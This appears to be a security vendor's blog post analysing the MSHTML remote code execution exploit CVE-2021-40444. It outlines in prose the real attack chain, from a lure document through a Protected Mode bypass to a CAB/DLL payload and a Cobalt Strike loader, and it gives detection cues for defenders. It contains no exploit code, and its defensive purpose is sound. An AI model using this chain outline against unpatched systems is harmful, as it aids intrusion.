A recently discovered exploit targeting a vulnerability in Microsoft’s internal browser engine, MSHTML, could become a prolific tool by cyber criminals in both targeted and wide-spread campaigns. CVE-2021-40444, a remote code execution vulnerability within Microsoft’s MSHTML browser engine was disclosed by Microsoft in a 07 September 2021 advisory1 but a malicious document involved in the exploit chain was discovered separately by security researchers a week prior. Public analysis of the document has led to the creation of multiple proof of concepts of the exploit now widely available. Despite the availability and ease of use of the exploit, any attack chain involving the exploit will generate noticeably anomalous behavior on the target machines.

According to Microsoft in a 15 September analysis of the exploit chain2, attacks involving the exploit were first observed in August 2021 in which emails posing as legal agreements led the victim to the malicious document on a file sharing site. Once the document was opened, a malicious JavaScript contained in another remotely hosted file was loaded via an external OLEObject relationship. The use of the exploit allowed the attack to circumvent Protected Mode in Microsoft Office, thus not requiring any additional interaction by the victim. From there, a remotely hosted CAB file containing a DLL posing as a INF file was downloaded, decompressed, then loaded, which in turn fetched a custom Cobalt Strike beacon loader. 

New call-to-action

The exploit itself is not technically challenging to deploy, and since the exploit was first made known to the broader public, several proof of concepts have been publicly released to include examples which makes customization relatively easy. As MSHTML is exposed in all Microsoft Windows environments, the exploit will remain effective on any unpatched system. Thus the availability and far reach of the exploit will likely make it a common tool among attackers conducting wide-spread malicious email campaigns. 

Analyzing the exploits

ReaQta analyzed the use of both the exploits found in the wild and proof of concepts available to the public, and found glaring red flags instantly among the telemetry. To include techniques known on the MITRE ATT&CK Framework such as T1129, Shared Modules.

ReaQta mapped the use of exploits to the MITRE ATT&CK Framework

In loading the module, the attack leverages Microsoft’s URL protocol handler but for control panel files, “.cpl://”, followed by a relative path traversal. Aside from the loading of the module, the use of .cpl:// in the URL is conspicuous and in particular its use in loading an INF file.

Of course, besides the very unusual activity around loading the malicious module, overall behaviour of Microsoft Office triggers numerous actions resembling known techniques mapped to the MITRE ATT&CK framework as well as spawning child processes.

The attack chain generates numerous events mapped to known techniques.

Even without a patch covering CVE-2021-40444, similar exploits — even against zero day vulnerabilities — cannot be executed without generating activity on target machines that is not highly anomalous thus detectable by an effective EDR protection. While attackers must first work to evade standard security features in the OS, such as additional warnings and restrictions for users like with Protected Mode, living off the land attacks require atypical use of legitimate tools and protocols available on the target machine. Additionally, the attack cycle does not end with successful exploitation of CVE-2021-40444. The attackers must still conduct follow-on activity to gain wider access to the target’s network.

New call-to-action

In-depth monitoring and threat detailing with ReaQta-Hive

ReaQta-Hive is designed to detect such activity immediately, but agents can more specifically detail the threat through the use of ReaQta’s DeStra engine. The DeStra engine allows for an additional layer of monitoring capabilities, allowing blue teams to craft simple yet sophisticated correlations based on the insights of the HIVE agents. While exploits against CVE-2021-40444 already trigger alerts in HIVE, a DeStra rule can mark the specific attacks in an alert. In this case matching the observed user agent in the HTTP request for the second stage payload (“Microsoft Office Discovery Protocol”) or matching the use of .cpl:// with a relative path traversal in the command line of an event.


[1] ​​Microsoft. 2021. “Microsoft MSHTML Remote Code Execution Vulnerability.” Microsoft Security Response Center.

[2]Microsoft. 2021. “Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability.” Microsoft Threat Intelligence Center.

To learn more about what makes ReaQta unique, please visit Why ReaQta and apply for a demonstration.

Close Bitnami banner